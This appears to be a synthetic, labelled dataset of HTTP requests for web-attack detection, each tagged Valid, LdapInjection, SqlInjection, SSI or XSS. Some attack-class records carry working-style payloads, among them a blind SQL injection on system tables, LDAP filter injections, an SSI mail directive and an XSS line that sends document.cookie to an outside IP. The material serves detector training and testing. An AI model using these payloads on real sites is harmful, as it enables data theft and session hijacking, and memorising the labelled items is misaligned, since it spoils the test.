Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38851
Start - Id: 37003
class: LdapInjection
GET /formkDR6connect6Bn.8child/oehhH/hY-/i8N.aZaF/rdfusd/JTNjY6F/thc/10rGWm18/o5dwhk2w72D_e0Z/r9DiumXztHAUV.exe?ooudUcsxbxdc8vi=3L%29%28%26%28objectClass+++%3Dsaae*%29&fhB=st&zounionaG=kO6_Dwk2sXB&nfpt=1eyhe4ens&s1YeTn=5 HTTP/1.0
Host: www.etcd.be
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-korean;q=0.5, cp-936;q=0.1, windows-1251, us-ascii;q=0.1, us-ascii;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 134.238.253.203
Cookie: wtvs61i=htW.XBi;assUneaqnRlTeoc=h98hstyleftpnscs1um;isncxItr=enncZuai9h;nodenRboot.inis;roarowpephtarhe=392
Cookie2: $Version="554"
Date: Sat, 16 Sep 06 02:56:53 CET
ETag: W/"90Qjiqk4A1FWruj"
Expect: 100-continue
From: 4taAnee@sfR4.cz
If-Modified-Since: Sat, 07 Apr 07 22:26:38 CET
If-Unmodified-Since: Wed, 30 Aug 06 07:16:24 CET
If-Match: "hawz@beP@TkDSgMB"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 06
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: VoiE eezne=thIO
Range: 11-,-9658
Referer: http://www.nkrtsr.fr/eaos.mp3
TE: gzip;q=0.0
Trailer: If-Match
User-Agent: Mozilla/9.8 (Windows; U; Win98 8.5; ae-ed; rv:4.9.4) Gecko/67120000
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37003
Start - Id: 34590
class: Valid
POST /ma/Un5iauh/NkbodypsLoptmEkSMe.htm? HTTP/1.0
Content-Length: 45
Content-Language: prxnchmR,TKe
Content-Encoding: gzip
Content-Location: /Oepl5w7/cjesat3e.php4
Content-MD5: TkRvc2U2YWVlYWFlbGNzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Aug 07 01:17:47 GMT
Last-Modified: Sat, 11 Dec 04 16:28:18 GMT
Host: www.ktas.it
Connection: omgihopf
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: xIcf6s-senwwu, uesiYoh-l3Er, so0a-E;q=0.8, fidh4-g4yeezle;q=0.0
Cache-Control: min-fresh=34
Client-ip: 101.186.217.139
Cookie: usebeisede=otoieb5af;rclcennyaudruat=87029
Cookie2: $Version="5"
Date: Fri, 20 Jun 08 06:13:36 UTC
ETag: "T.KnvkDquWa5rby"
Expect: 100-continue
From: hAcasd@ertucieec.de
If-Modified-Since: Mon, 08 Nov 04 09:11:30 GMT
If-Unmodified-Since: Sat, 19 May 07 07:02:38 UTC
If-Match: "jYyG0Vw3ecOPnygZ_Fqu"
If-None-Match: "VKTy9QHX2rYTYjO"
If-Range: Fri, 31 Oct 08 02:30:22 GMT
Max-Forwards: 35
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="aerr"
Range: 1867-,-2727
Referer: http://www.1tluiht9.fr/w3sa4soi.shtml
TE: gzip,trailers,chunked;q=0.9
Trailer: Date
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 5.7; md-2w; rv:0.8.7) Gecko/79409534
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: 5holu/6.9 77.165.28.161, 6.4 179.245.225.131
Transfer-Encoding: ler2s
Upgrade: aiiee/8.2, tosd/8.9
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 219.77.85.235
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5es=tut1Oo&dl=76739&aYcSecEtnnt=e1eEM&bdohz=0

End - Id: 34590
Start - Id: 41785
class: SqlInjection
GET /riLXjKegesi.eH/nxnode/HtKpr3CL/y-BrYtYrnUKVYEi75y9.js?nh2preo7behp=AND+++ascii%28lower%28substring%28%28SELECT+++TOP+1+++Nuns++FROM++++sysobject+++WHERE+++xtype++%3D++%27U%27++%29%2C1%2C1%29%29%29++++%3E+++++111&r7zrsybt0r=yFotoek6&gg=uaef&elAl=227&K0lvnYJh57hm=nmldhtAsm%26&iEms8ikpXedaaee=s4ifbflogn%24texecan1t HTTP/1.0
Host: www.wzfvIls.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: eux='b4N'
Client-ip: 28.101.148.145
Cookie: ipkRRstyle-OTlw=uoXYwj;ifl7itsw=56;wn6imierouwNna=6
Cookie2: $Version="3"
Date: Thu, 06 May 04 13:54:21 GMT
ETag: ".4g273Gu0e1YegQr"
Expect: cvnt=RiEntn
From: nIeior@tiriRlyas.net
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 08 Sep 05 18:18:55 GMT
If-Match: "8Pum.frRG9Mt@OdzqDl"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: Bsreid=ie
Proxy-Authorization: bn6u eNiil=ettssimU
Authorization: 1drue cinwmP=lveSh
Range: 4745-5836
Referer: http://www.itqn.biz/staheun.jsp
TE: gzip,trailers,deflate;q=0.4
Trailer: Upgrade
User-Agent: eXPK.5Di http://www.EsEdloe.st
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: FTP/8.6 46.11.234.136, FTP/4.2 www.al5aNwo.js:35, 0.1 114.78.57.184
Transfer-Encoding: identity
Upgrade: yswa/6.4
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41785
Start - Id: 32148
class: Valid
GET /lr5ieootetucmdm8ia/qmDb/tEx/staeaefooLe1pJhhHrh/s12Auku5Dyd/vlaet1tEc5Reh/tG5nlfkgyih/hrtdst8t.dll? HTTP/1.1
Host: www.loevPtilo.org
Connection: sqqaae
Accept: application/zip;q=0.7
Accept-Charset: windows-874;q=0.4, koi8-r, big5, cp-932
Accept-Encoding: gzip, compress;q=0.3, identity;q=0.3, deflate;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.51.151.14
Cookie: @qaBHwKthN-6=fFlSWwTrQYR;eno1ansb=26;Tntt0hEyrgaryhn=0297308;h6nooauel=imia
Cookie2: $Version="0"
Date: Sat, 08 Nov 08 12:50:52 GMT
ETag: "CH.WFiPEwxl1KjUgSnC"
Expect: 100-continue
From: fcshsyfh@3ynaok.gov
If-Modified-Since: Tue, 12 Feb 08 05:05:22 CET
If-Unmodified-Since: Sun, 10 Sep 06 01:42:31 UTC
If-Match: "Oi4d6FmSUanny0lLu7LT"
If-None-Match: *
If-Range: Sun, 01 May 05 13:33:11 CET
Max-Forwards: 5
MIME-Version: 9.3
Pragma: j='ca7zfcs'
Proxy-Authorization: ehuic ztnirYi=Taheeeu
Authorization: Digest realm
Range: -3
Referer: http://pyLpnrbe.cz/uselmio/ewlTep.zip
TE: gzip;q=0.2,gzip,trailers
Trailer: From
User-Agent: Mozilla/5.6 (Windows; U; WinNT 4.0; 7a-ge; rv:6.6.2) Gecko/07690575
UA-CPU: PowerPC
UA-Disp: 3488,5746,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7140x9555
Via: jLa/7.8 209.212.112.165
Transfer-Encoding: compress
Upgrade: Ees/0.0, su1i/1.3
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 32148
Start - Id: 39462
class: SSI
GET /on0mmZ3kOiKICwvnQQ/e1GedvIwWy56Wz-.Ec/ouR8/s1ydasOeie5sSsfE/oa/0s9hbZAaXLEyQQH_REsX/D1csnnyaoSHSoSO/etde/rOtd/uw5.css?avernw=%3C%21--%23email+fromhost%3D%22www.yeloaf.com%22+tohost%3D%22mailbox.sApn.com%22+message%3D%22sfiIbi+tkneMrI+NhiO+6SoeH%22+fromaddress%3D%22egto.com%22+toaddress%3D%22oae.na.com%22+subject%3D%22goo%22+sender%3D%22a3.com%22+replyto%3D%22Nlaneie.com%22+cc%3D%22poLk%22+inreplyto%3D%22ljc+kmlT+j6n%22+id%3D%22unmail%22+--%3E HTTP/1.1
Host: 247.185.134.133:80
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.1, compress, compress, gzip, identity;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 91.67.57.209
Cookie: ssYsnhi4cnL4p7T=aUciboA8Iem0lsn0e;Haj=e:r ;TXAbV=3854;4ito6Rle=r-a_
Cookie2: $Version="5"
Date: Sun, 18 Nov 07 19:01:31 UTC
ETag: "LhCcRWhjKnJRhPq"
Expect: ris5rtt=czils
From: a7fo@TTrA.it
If-Modified-Since: Wed, 18 Aug 04 06:12:49 UTC
If-Unmodified-Since: Sat, 02 Jun 07 07:12:15 CET
If-Match: "ZB-Y8j_SOmz1S1HFmt"
If-Range: Fri, 30 Oct 09 12:03:54 GMT
Max-Forwards: 37
MIME-Version: 7.4
Pragma: dcsce='7aa'
Authorization: Digest qop=auth-int
Range: -2397
Referer: http://gscE.org/sg1IEcbn.php
TE: gzip
Trailer: Referer
User-Agent: menarlon2ltare
UA-CPU: 68000
UA-Disp: 725,135,16
UA-OS: Linux
UA-Color: color32
Via: FTP/9.8 www.aswaowi.html
Transfer-Encoding: compress
Upgrade: mwv/5.9, jxt9eh/8.4, lch/8.1, nSc/9.6
Warning: 920 www.sgadis2e.js "onamHixfuolaten" 
----: --------------------------------------------

null

End - Id: 39462
Start - Id: 12968
class: Valid
GET /iYP68YY1c.dll? HTTP/1.0
Host: 215.174.209.238
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, windows-1250, x-mac-japanese, x-mac-icelandic;q=0.0, iso-8859-8-i
Accept-Encoding: *;q=0.7
Accept-Language: 8ss678-en;q=0.6, ih-ftTredd2, s-thhx;q=0.4
Cache-Control: trhcso='toa'
Client-ip: 20.50.23.5
Cookie: iim=3
Cookie2: $Version="848"
Date: Sun, 09 Jan 05 15:59:10 UTC
ETag: "dCDiiY9RB7DsOD7b"
Expect: eSicNis
From: picsvpm@izhyigm.biz
If-Modified-Since: Mon, 11 Apr 05 03:44:34 GMT
If-Unmodified-Since: Wed, 12 Aug 09 16:25:58 CET
If-Match: "bGxmWTXlhmGk9W8pzT"
If-None-Match: *
If-Range: "dwn61ztrg6hHgoG"
Max-Forwards: 08
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: NTLM OWhta2w4blllb2xoa25pc2VpYThob2VnaWRob2VucE5SZWluTQ==
Range: -49,43337-328,4-
Referer: /liltxn/4Ese/yiAta.swf
TE: trailers,trailers
Trailer: TE
User-Agent: lnueedenhia
UA-CPU: Sparc
UA-Disp: 1205,305,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 501x762
Via: FTP/5.2 www.TlXiwttn.jpg
Transfer-Encoding: tlanE; gienx=eqamU3e
Upgrade: osnA4i/7.7, iahE/2.8, r1suiw/2.4, ignt/8.2, egc/6.3
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 0390911132263126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12968
Start - Id: 47550
class: XSS
GET /8l5E/bBs/EfIetkObHp9sf6ddhzah/ile5ro/osuyKk2iPLYD77ezVbea/sPz8eDz0_/c3bseaare2aeeBrEr/W6xUY/3teBn6tr/tFSybfz/eQiIQqca4.js?@xp_Dtqinput.MCr=82034&Eeh8oi97habt1=74orCnu8iDry%3B7&ote84e=%3C%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F204.3.103.189%2Fansi.swf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E HTTP/1.1
Host: www.rcyHoO.it
Connection: jTtc
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: rclle-Obnkv0;q=0.1
Cache-Control: only-if-cached
Client-ip: 120.244.182.14
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Wed, 31 Oct 07 02:30:52 GMT
ETag: "5Prg8S_P@.fZQyoZ"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Wed, 21 May 08 10:09:46 GMT
If-Unmodified-Since: Mon, 04 Feb 08 07:48:06 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "CmaAQK-U8Xgeh@fKFy"
If-Range: Wed, 31 Dec 08 12:55:12 GMT
Max-Forwards: 062
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM Nm5laWV0MGl2TnRzb0VhMnJrbG1pbmQ2ZWFkemN0Zzk1ckZCaGU=
Authorization: Basic Y21lbjpvbW9hc2U=
Range: 2718-09734,749039-
Referer: http://dcfyiErA.de/zh9ll9.tar.gz
TE: deflate;q=0.3
Trailer: Accept-Language
User-Agent: oeehqtahSnbiiclek7
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2187x3503
Via: HTTP/3.0 245.57.233.254:3034, fsm4/8.0 www.oclhx.tiff
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47550
Start - Id: 46655
class: XSS
GET /7wob/fxt2lun69gspkbPOo/k62d6N3pPF8QBEz/zz6xlB6awpassthruFKcRk/raaV2/7litoogMeazrhtsaelio/Aorlwns2Net/iOorQ/6I-YUwy4/acceptKmVX8abfWxlike.T0.sh?2P9-ToEagnph-2=oEs%22anu&E.5fl=283 HTTP/1.0
Host: www.06o5Od.net
Connection: etouzeo
Accept: application/*;q=0.6
Accept-Charset: hz-gb-2312, windows-1258, macintosh, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: tEe8ei='aom'
Client-ip: 177.52.172.145
Cookie: eoUedsraterrj=5-TV7;nesourwbas=le;vbscriptoptrmi-andG=<div  style  =    "binding:    url([http://www.telinere.com/script/t2e.php4]); "   >
Cookie2: $Version="911"
Date: Sat, 30 Apr 05 02:25:38 CET
ETag: W/"UZZb2JZhOTt71FjvfCKp"
Expect: 100-continue
From: iam9mt@lo1hek.gov
If-Modified-Since: Wed, 11 Feb 04 10:27:33 GMT
If-None-Match: "C0Y@9zSVn@f-.E7hYduD"
If-Range: *
Max-Forwards: 8978
Pragma: no-cache
Authorization: csbF tslasko=rzhto
Referer: http://oatrurm.biz/Aigg5a5/ruticR/tg5mt/yIaacIoa.cfm
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 4.6; 6f-tu; rv:3.6.3) Gecko/82322010
UA-OS: WinNT
Via: HTTP/3.8 40.57.5.56
Transfer-Encoding: gzip
Upgrade: pesis/7.5, lqrttT/4.6, bTsote/3.0, cstc/2.2, peotn/4.0
Warning: 466 152.152.48.226 "ecjo" 
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46655
Start - Id: 13695
class: Valid
GET /catLCTgconnectEOh9X/lthdpeniraa/eXDxms/rGMonp/s9VFvjGkWHLr5gKhT.css?gmEc1ll=crnResihanlzmdtuoP&zDfimetpnra=357565&msgshsz9qeee=7243050&3fHFTJ=aZHCZ.I&io8npsPgcaEcq=%40o6&ewwdroh=nzxtsock_streamWmrsot&byo0steDVbml7=eLn&2VOyjh5i68=segr+agtsbhttpsdvaa HTTP/1.0
Host: 230.250.224.173
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ontetcca-molIqash;q=0.9, sUtagib-1bi;q=0.9, hv0-WH, E2uwoma-osrsH
Cache-Control: no-store
Client-ip: 125.21.251.16
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sun, 22 Jul 07 24:17:18 UTC
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 21 Oct 08 22:47:57 CET
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 301
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: itaAt ua0ako=mdfeoah
Range: 7428-
Referer: /nSjd/i6crzfn.wmn
TE: trailers,trailers,chunked;q=0.4
Trailer: Authorization
User-Agent: nini0astnyccs
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: HTTP/8.0 www.hdelb.htm, 8.5 www.nltdw.js
Transfer-Encoding: gzip
Upgrade: 4yH/4.4, dcnnon/3.0, oltntt/9.4
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13695
Start - Id: 38710
class: LdapInjection
GET /Y3HC-processing-instructioncmd/itIEhVxcl/tuhH3/suoFRct1oenex1/teAmu/iv/kFUSS6_m/sTBaAz/dn6C2DoCUSkA0OZgX3/fdmEtFIu-ggroup byJ84p/lqNpAIbdRVYF.mdb?onneg=naazrt2tgAaonc&doAsubtmnaOt=7hw8AHx7w&AJnx@Jscript=%29%28%7C%28displayName%3Dhad*%29+++%28name++%3D++++had*++%29%28++++mail%3Dhad*%29&kLmFD0ZklTselect=998925 HTTP/1.1
Host: www.qp1ee.org
Connection: close
Accept: video/*, image/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.7, gzip, gzip
Accept-Language: ost-speaiE;q=0.0, bdaom-b5et;q=0.4
Cache-Control: only-if-cached
Client-ip: 176.79.6.203
Cookie: ce0jTusejelthA=tll0rSlto9i
Cookie2: $Version="7"
Date: Tue, 16 Jun 09 09:59:01 CET
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 19 Mar 07 01:53:34 CET
If-Unmodified-Since: Sat, 18 Feb 06 20:47:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Aug 07 21:30:57 CET
Max-Forwards: 7
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: /0Wtoaeo/wOie/nps3dre.txt
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.3 (X11; U; Linux i386 7.4; bm-5i; rv:0.5.4) Gecko/69739106
UA-CPU: PowerPC
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: FTP/7.0 www.zoon.css
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38710
Start - Id: 13190
class: Valid
GET /ulibIQ/hzrxuithslDolct.aspx?fZiframe68lKXnhttps=28270106 HTTP/1.1
Host: 88.68.233.179
Connection: keep-alive
Accept: application/postscript;q=0.2, video/mpeg;q=0.0, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i5eqgwlE-oey;q=0.7, eser-9t;q=0.9, arNnbah-w, h-2
Cache-Control: max-stale
Client-ip: 169.235.34.90
Cookie: ioiewlgD7=34;oaosnehcin=dscr
Cookie2: $Version="70"
Date: Fri, 19 Sep 08 01:02:17 UTC
ETag: W/"CHJemz4YjAijP7F-"
Expect: 100-continue
From: rejnuaHz@hckar.biz
If-Modified-Since: Tue, 12 Jan 10 05:26:22 CET
If-Unmodified-Since: Fri, 17 Nov 06 10:50:43 UTC
If-Match: "hHBLic6@x.xSraadZi"
If-None-Match: *
If-Range: Wed, 26 Jul 06 23:47:49 CET
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="gohid"
Authorization: Digest nonce
Range: 645-,3478-02,76763-7861
Referer: http://www.4limrsdf.com/0ideaeb.pdf
TE: deflate,trailers
Trailer: Date
User-Agent: ronahrdo/7.4.6.2
UA-CPU: x86
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: FTP/7.8 236.155.135.124
Transfer-Encoding: compress
Upgrade: e0t/7.4
Warning: 093 www.sqesrdhj.jpeg "auusyDnie" "Tue, 02 May 06 18:48:59 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2985337239117485
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13190
Start - Id: 2193
class: Valid
GET /hJ@QHORThGz4.php3? HTTP/1.1
Host: www.nyfAsIqo7F.it
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: aiBlpos=mVy
Client-ip: 237.70.211.248
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="2"
Date: Thu, 16 Apr 09 21:30:01 CET
ETag: "7dKcolqFrPttQt23Vf"
Expect: ehcy=Tdns;Ttdtl=taCsutqn
From: EAirsero@neoLi.gov
If-Modified-Since: Thu, 04 Jun 09 19:32:58 CET
If-Unmodified-Since: Sat, 21 May 05 21:56:46 UTC
If-Match: "SO_lzf-AZqUZGUePT"
If-None-Match: "U7AqomhdU4DrI7l1W"
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 8
MIME-Version: 3.0
Pragma: ceSea='a'
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Digest username="kdhf"
Range: 646-76073,721917-1
Referer: http://www.xsibu.uk/a8asza/aeZcb/eLtiu1ut/Nqomn.wmn
TE: deflate;q=0.1,chunked;q=0.1,trailers
Trailer: If-None-Match
User-Agent: oQA9bVrs-8 http://www.od8Lw.net
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 318x353
Via: 9.1 154.28.64.80, FTP/0.9 www.uoUwtrut.png:4, 7.7 www.in5nfhha.shtml
Transfer-Encoding: e1oPa; 9drieE=nzrWmeS
Upgrade: ioc/1.6, eutE3/1.3, SawaL/3.8, ldot0/6.1, oha/5.5
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2193
Start - Id: 24465
class: Valid
GET /fI1ss.BajnnG/I3@bBjWL4.I@klib_/eq8f-eoA0Im1OEWpEK/n49mT@au05b28-jl/nIcs/ngE1MbablL831ykODU/go2/d7qkYs59nczLMMdZeJ/dF.ZJAwXEAyVqA5BRAJS/eSsz2/ptDeitbeoR.htm?fIblletcg=5737&wiikqolh=7srebSn&leOdhcyF=taalh&0QyU=745582&2oaeOysxrinto=pwpr9ts9&ijhslt9iSa1oNeu=otr&sTtvQ=5095&eioesMmntie=aGZ2lV&leyve=ty1t6ite&tIaaDregots=570606&ogjtimprdm3txam=034 HTTP/1.0
Host: 157.167.194.149
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.0, compress;q=0.8, compress, deflate;q=0.9, identity;q=0.7
Accept-Language: uo-o, m-xie, p3bT-15ut, Dtil-mntio;q=0.4
Cache-Control: no-cache
Client-ip: 60.13.48.217
Cookie: Uyio=ng5cid0d;crnaloaoatn2=nfsehEN=itm&samnab;fzk=89569728;u1N4tR4hcopyja=uSKmTSB@R
Cookie2: $Version="1"
Date: Sat, 15 Nov 08 09:00:04 GMT
ETag: "L7.MGOCMhvEcaCCmm_j"
Expect: 100-continue
From: dhthnl@6nYTwqee3.com
If-Modified-Since: Fri, 24 Nov 06 10:50:47 GMT
If-Unmodified-Since: Sat, 13 Sep 08 17:37:57 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Apr 07 05:08:42 UTC
Max-Forwards: 6
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="esafneap"
Authorization: 39et q6no=dnUbyw
Range: 10-87
Referer: /pitqa/ib2o/5eiprd2t/aam1dVsf.gz
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: Mozilla/8.9 (X11; U; Linux i386 4.6; sx-e8; rv:8.9.8) Gecko/92876469
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 014x1299
Via: 1.3 16.253.236.173
Transfer-Encoding: compress
Upgrade: hlnw/4.2
Warning: 088 www.eodr.jpeg "rhhnDc5u" "Tue, 06 Sep 05 21:39:36 UTC"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24465
Start - Id: 18817
class: Valid
GET /axd8iuYVFkotc_me/ipljewq-Y_-/h5JmAHLpY_g/wr4Go@T1j0EyM.html? HTTP/1.1
Host: www.ak2giyr.net
Connection: 3sro
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.1, euc-kr;q=0.4, euc-jp;q=0.7, x-mac-turkish, x-mac-roman;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: reoctbzu='eus0lna'
Client-ip: 165.33.188.52
Cookie: oof5caogccjhtap=%up3:itmpwnUd3ittu
Cookie2: $Version="3"
Date: Thu, 27 Jan 05 11:32:56 CET
ETag: "G1nWhG63FhyfhWpQ80"
Expect: nnjett3n=ec7e2boR;udjt7=33hf
From: lyanosta@Omsuau.be
If-Modified-Since: Thu, 26 Jul 07 20:44:49 UTC
If-Unmodified-Since: Tue, 01 May 07 13:45:27 UTC
If-Match: *
If-None-Match: "BMJGk8wNyZozYjMVCQSO"
If-Range: *
Max-Forwards: 77
MIME-Version: 9.5
Pragma: he='orimQrI'
Proxy-Authorization: Digest uri=http://www.kolc.org/tlvE/echeo1s/8Mqoudg/aa8n6lis.tar
Authorization: toshgo ncbhlO=txMYs
Range: -0457,62668-,60-4
Referer: http://www.0isP.st/eOdbal/oD37t.rar
TE: deflate,deflate,deflate
Trailer: If-Range
User-Agent: rRpXw4jnNz http://www.nia3.cz
UA-CPU: x86
UA-Disp: 484,123,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4147x8311
Via: 7.0 105.147.202.161, 3.8 231.94.2.94
Transfer-Encoding: identity
Upgrade: 2o6tg0/3.8, nAhes/7.2, nvoe/3.7, inS6/3.8, y1es/8.2
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 66591156
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18817
Start - Id: 12976
class: Valid
GET /LQRGeV6/lag-/location6WlZQx/tmigl0nlnrrtTizzen/nhYGa7R63bc/AYfAWsPcopy@T/cco4nx/orttuvh9iAEbEel.gif?rdtllfa0homm1=0aasgecmitscriptomse&ZDQMlK4F=8a HTTP/1.1
Host: 212.10.205.3:77208
Connection: e1dnqsdi
Accept: */*
